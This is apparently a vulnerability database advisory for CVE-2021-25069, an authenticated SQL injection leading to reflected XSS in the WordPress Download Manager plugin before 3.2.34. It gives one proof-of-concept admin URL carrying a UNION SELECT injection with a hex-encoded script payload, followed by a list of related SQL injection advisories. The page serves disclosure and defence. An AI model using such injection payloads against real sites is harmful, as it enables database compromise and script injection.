WordPress Download Manager < 3.2.34 – Authenticated SQL Injection to Reflected XSS | CVE 2021-25069 | Plugin Vulnerabilities

Description

The plugin does not sanitise and escape the package_ids parameter before using it in a SQL statement, leading to a SQL injection, which can also be exploited to cause a Reflected Cross-Site Scripting issue

Proof of Concept

https://example.com/wp-admin/admin.php?page=wpdm-stats&package_ids%5B0%5D=0%29+UNION+SELECT+1%2C0x3c2f6f7074696f6e3e3c2f73656c6563743e3c696d6720737263206f6e6572726f723d616c6572742831293e+--+p

Affects Plugins

download-manager

Fixed in 3.2.34

References

CVE

URL

https://plugins.trac.wordpress.org/changeset/2656086

Classification

Type

SQLI

OWASP top 10

CWE

CVSS

Miscellaneous

Original Researcher

Krzysztof Zając

Submitter

Krzysztof Zając

Submitter website

https://kazet.cc/

Verified

Yes

WPVDB ID

4ff5e638-1b89-41df-b65a-f821de8934e8

Timeline

Publicly Published

2022-01-20 (about 3 years ago)

Added

2022-01-20 (about 3 years ago)

Last Updated

2022-04-12 (about 3 years ago)

Other

Published

Title

Published

2023-05-30

Title

Tutor LMS < 2.2.0 - Unauthenticate SQL Injection

Published

2020-10-22

Title

Advanced Booking Calendar < 1.6.2 - Unauthenticated SQL Injection

Published

2025-01-15

Title

Taskbuilder < 3.0.7 - Authenticated (Subscriber+) SQL Injection

Published

2025-03-03

Title

Multiple Shipping And Billing Address For Woocommerce < 1.5 - Unauthenticated SQL Injection

Published

2025-04-03

Title

Booking Calendar and Notification <= 4.0.3 - Unauthenticated SQL Injection